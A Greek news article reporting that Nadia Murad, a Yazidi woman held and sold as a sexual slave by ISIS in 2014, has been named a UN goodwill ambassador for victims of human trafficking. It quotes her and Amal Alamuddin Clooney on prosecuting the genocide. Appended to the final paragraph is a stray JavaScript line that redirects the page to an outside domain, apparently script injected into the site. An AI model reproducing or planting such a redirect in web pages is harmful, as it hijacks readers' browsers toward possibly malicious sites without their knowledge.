Μία γιαζίντι πρέσβειρα του ΟΗΕ

0
9

 

Η 23χρονη Νάντια Μουράντ Μπασί Τάχα από το Ιράκ έζησε δραματικές στιγμές στα χέρια των τζιχαντιστών του Ισλαμικού Κράτους που την έπιασαν αιχμάλωτη και την έκαναν σεξουαλική τους σκλαβα όπως τόσες άλλες κοπέλες της φυλής της.

Απήχθη από το χωριό της, το Κόσο, κοντά στη Σίντζαρ (βόρειο Ιράκ) τον Αύγουστο του 2014 και οδηγήθηκε στη Μοσούλη, πόλη που τελεί υπό τον έλεγχο του ΙΚ. Υπέστη ομαδικό βιασμό από τους μαχητές του Ισλαμικού Κράτους και πουλήθηκε πολλές φορές ως σεξουαλική σκλάβα.

Μόλις απελευθερώθηκε έβαλε σκοπό της ζωής της να ενημερώσει και να ευαισθητοποιήσει για τα δεινά των γιαζίντι αγοριών και κοριτσιών. Από χθες, η Νάντια Μουράντ διορίστηκε πρέσβειρα του ΟΗΕ για την αξιοπρέπεια των θυμάτων παράνομης διακίνησης ανθρώπων και πλέον θα μάχεται από θεσμική θέση ώστε οι διώξεις που διαπράχθηκαν το 2014 κατά των γιαζίντι να αναγνωριστούν ως γενοκτονία.

«Ο μεγάλος φόβος μου είναι πως, όταν ηττηθεί το Ισλαμικό Κράτος, οι τρομοκράτες του θα ξυρίσουν τα γένια τους και θα αναμιχθούν με το πλήθος σαν να μην έχει συμβεί τίποτα. Δεν πρέπει να αφήσουμε να το κάνουν αυτό» επεσήμανε η κοπέλα.

Ως πρέσβειρα καλής θέλησης του ΟΗΕ θα προσπαθήσει να κάνει γνωστή την τύχη των θυμάτων της παράνομης διακίνησης ανθρώπων, ιδιαίτερα των προσφύγων, των γυναικών και των κοριτσιών.

Εκπροσωπείται από τη διεθνή δικηγόρο ανθρωπίνων δικαιωμάτων Αμάλ Αλαμουντίν Κλούνεϊ, η οποία δήλωσε πως το ISIS είναι ένοχο για γενοκτονία και πρέπει να λογοδοτήσει.

«Χιλιάδες γυναίκες γιαζίντι έγιναν σκλάβες από μια τρομοκρατική οργάνωση, το ΙΚ, που διαπράττει γενοκτονία κι όμως το έγκλημα αυτό παραμένει ατιμώρητο. Ντρέπομαι ως άνθρωπος που διαπιστώνω πως οι εκκλήσεις τους για βοήθεια δεν εισακούονται«, πρόσθεσε η Αλαμουντίν Κλούνεϊ.

Ο Γενικός Γραμματέας του ΟΗΕ Μπαν Κι-μουν δήλωσε ότι «συγκινήθηκε μέχρι δακρύων» από το μαρτύριο της Νάντια αλλά και από τη «δύναμη, το θάρρος και την αξιοπρέπειά της».

Η κοινότητα γιαζίντι είναι μια κουρδόφωνη μειονότητα που διώκεται από τους τζιχαντιστές. Σύμφωνα με τον ΟΗΕ, περίπου 3.200 γιαζίντι βρίσκονται αυτήν τη στιγμή στα χέρια των ισλαμιστών τζιχαντιστών, η πλειονότητά τους στη Συρία. Τα κορίτσια γίνονται σεξουαλικές σκλάβες, ενώ τα αγόρια περνούν από κατήχηση και ακολούθως στέλνονται στη μάχη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here